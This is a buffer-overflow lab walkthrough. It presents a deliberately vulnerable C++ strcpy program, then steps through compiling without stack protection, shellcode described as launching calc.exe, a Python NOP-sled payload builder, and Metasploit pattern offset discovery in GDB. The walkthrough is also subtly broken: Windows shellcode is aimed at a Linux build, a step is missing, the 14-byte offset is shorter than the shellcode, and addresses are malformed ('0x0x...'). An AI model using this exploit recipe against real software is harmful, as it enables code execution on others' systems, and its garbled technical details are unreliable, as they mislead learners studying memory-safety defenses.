```c
#include <iostream>
#include <cstring>

void vulnerable_function(char *input) {
    char buffer[10];
    strcpy(buffer, input); // Vulnerable function: no bounds checking
    std::cout << "Buffer: " << buffer << std::endl;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        std::cerr << "Usage: " << argv[0] << " <input>" << std::endl;
        return 1;
    }

    vulnerable_function(argv[1]);
    return 0;
}

```



1. **Vulnerable Function:**
    
    - `vulnerable_function` takes a `char` pointer `input` as input.
    - It declares a fixed-size character array `buffer` of size 10 (including the null terminator).
    - It uses `strcpy` to copy the contents of `input` into `buffer`.
2. **Problem:**
    
    - `strcpy` doesn't perform any bounds checking.
    - If the size of `input` exceeds the size of `buffer` (greater than 9 characters), `strcpy` will continue copying characters until the null terminator is encountered in `input`.
    - This can overwrite data beyond the intended boundaries of `buffer`.

**Potential Consequences:**

- Overwriting critical data on the stack can lead to program crashes or unexpected behavior.
- In a malicious scenario, an attacker could craft an `input` containing malicious code (e.g., shellcode to execute `calc.exe`) and overwrite the function's return address on the stack. When the function returns, control flow would be diverted to the attacker's injected code, potentially allowing unauthorized actions.

**Safe Programming Practices:**

- Use functions with built-in bounds checking like `strncpy` (copies a limited number of characters) or safer alternatives like `std::string` in C++.
- Validate the size of user input before processing it.


---

### Lab Walkthrough

#### Step 1: Understanding the Vulnerability

The vulnerable function `vulnerable_function` uses `strcpy` to copy user input into a fixed-size buffer (`buffer[10]`). Because `strcpy` does not check the length of the input, if the input exceeds the size of the buffer, it will overwrite adjacent memory, including the return address of the function.

#### Step 2: Compiling the Program

First, compile the program without stack protection to make it easier to exploit:

```bash
g++ -fno-stack-protector -z execstack -o vuln_program vuln_program.cpp
```

#### Step 3: Creating the Exploit

To exploit this vulnerability, we need to overwrite the return address of `vulnerable_function` with the address of our shellcode. The shellcode will be crafted to open `calc.exe` on a Windows system.

##### Shellcode to Open `calc.exe`

Here’s a shellcode snippet that opens `calc.exe`:

```bash
\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5f\xb8\xc7\x93\xc2\x77\xff\xd0
```

Use the generated pattern as input to the program and observe the crash using a debugger (like GDB) to find the exact offset:

```bash
./vuln_program $(msf-pattern_create -l 100)
```

#### Step 5: Crafting the Exploit Payload

Assuming the offset to the return address is 14 bytes, the exploit payload will consist of:

1. NOP sled (to slide to the shellcode)
2. Shellcode to open `calc.exe`
3. Overwritten return address pointing to the NOP sled or shellcode

##### Constructing the Payload in Python

```python
import struct

# Offset found from debugging
offset = 14

# Shellcode to open calc.exe
shellcode = b"\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5f\xb8\xc7\x93\xc2\x77\xff\xd0"

# NOP sled
nop_sled = b"\x90" * (offset - len(shellcode))

# Address to jump to (example address, should be adjusted based on actual environment)
# You may need to find a suitable address using a debugger
return_address = struct.pack("<I", 0xdeadbeef)

# Final payload
payload = nop_sled + shellcode + return_address

# Write payload to a file
with open("exploit_payload", "wb") as f:
    f.write(payload)
```

#### Step 6: Running the Exploit

Run the vulnerable program with the crafted payload:

```bash
./vuln_program $(cat exploit_payload)
```

This should trigger the buffer overflow and open `calc.exe`.

### Note on Address

The `return_address` needs to point to the location of the NOP sled or the shellcode. This can be found using a debugger like GDB or Immunity Debugger on Windows.


---

## Optional

### Step-by-Step Guide to Finding the Offset

#### Run the Vulnerable Program with the Pattern

Execute the vulnerable program with the generated pattern as input. This will cause the program to crash, and the pattern will overwrite the return address on the stack.

```bash
./vuln_program $(msf-pattern_create -l 100)
```

#### Observe the Crash with a Debugger

```bash
gdb ./vuln_program
```

Within GDB, run the program with the pattern:

```bash
run $(msf-pattern_create -l 100)
```

Note the address where the crash occurred (e.g., `0x0x00005555555551b7`).

![[Pasted image 20240711024604.png]]

#### Find the Offset

Use `pattern_offset` to determine the exact offset of the pattern that overwrote the return address.

```bash
msf-pattern_offset -q 0x0x00005555555551b7
```
